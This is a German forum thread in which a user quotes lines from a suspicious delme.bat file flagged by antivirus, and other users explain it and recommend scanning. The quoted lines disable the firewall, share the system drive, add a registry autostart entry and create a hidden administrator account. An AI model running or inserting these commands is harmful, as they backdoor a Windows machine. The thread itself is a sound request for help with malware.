delme.bat

schmidmi

Lt. Commander
Registriert
Feb. 2007
Beiträge
1.823
Antivir meldete mir heute eine Datei unter C:\Windows namens delme.bat.

Ich habe sie mal mit dem Editor geöffnet und sie enthält mehrere für mich komische Anweisungen. Z.B.:

netsh firewall set opmode mode=disable

NET SHARE system=%SYSTEMDRIVE% /UNLIMITED

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Eksplorer /t REG_SZ /d %windir%\delme.bat /f

net user USER PASSWORD /add
net user USER PASSWORD
net localgroup administrators USER /add

Was kann das sein?
 
das is eine batchdatei die die (win) firewall ausschaltet,
einen neuen user anlegtzugriffe auf die systempartition ändert
und sicherstellt und die batchdatei in die registry schreibt, um sie nach jedem ssystemstart zu starten.
 
jap. ziemlich schädlich das ganze. Kein Wunder dass Avira alarm schlägt. Wenn du danach googelst findest du viele Seiten/Threads die das Thema behandeln.
z.B. [Link entfernt]
http://www.trojaner-board.de/49549-mein-pc-macht-er-will.html

Davon mal abgesehen dass der Name delme "Delete me" oder sowas auch schon vielaussagend ist. Lass deine Kiste mal komplett nach Viren, Spyware und dem ganzen krempel scannen
 
Zuletzt bearbeitet von einem Moderator:
Phoebus Ryan schrieb:
Wenn du danach googelst findest du viele Seiten/Threads die das Thema behandeln.
z.B. [Link entfernt]
Eben und weil die Leute nur Googeln, wenn sie nach Lösungen suchen, kommen sie auf Seiten mit dubiosen Ruf. :rolleyes:
Das beste Beispiel gibst du hier schon mal ab. Wenn man das Zeug auf der Seite runter lädt, kommt noch mehr Spyware und sonstiges Zeug dazu.
http://www.mywot.com/de/scorecard/spywareremove.com
 
Zuletzt bearbeitet von einem Moderator:
man sollte wot nicht überbewerten.
die angesprochene seite ist eine von diversen aus dem enigma software-paralleluniversum, um den spyhunter-schund an den mann zu bringen, aber nicht gefährlich.
This site is a division of Enigma Software Group USA, LLC and is managed by Four Winds Marketing, LLC., an authorized reseller of SpyHunter.
*
ich habe mehrmals darum gebeten, meine anleitung hinsichtlich strukturiertem vorgehen anzupinnen, aber anscheinend ist so etwas hier nicht erwünscht.:(
 
Zurück
Oben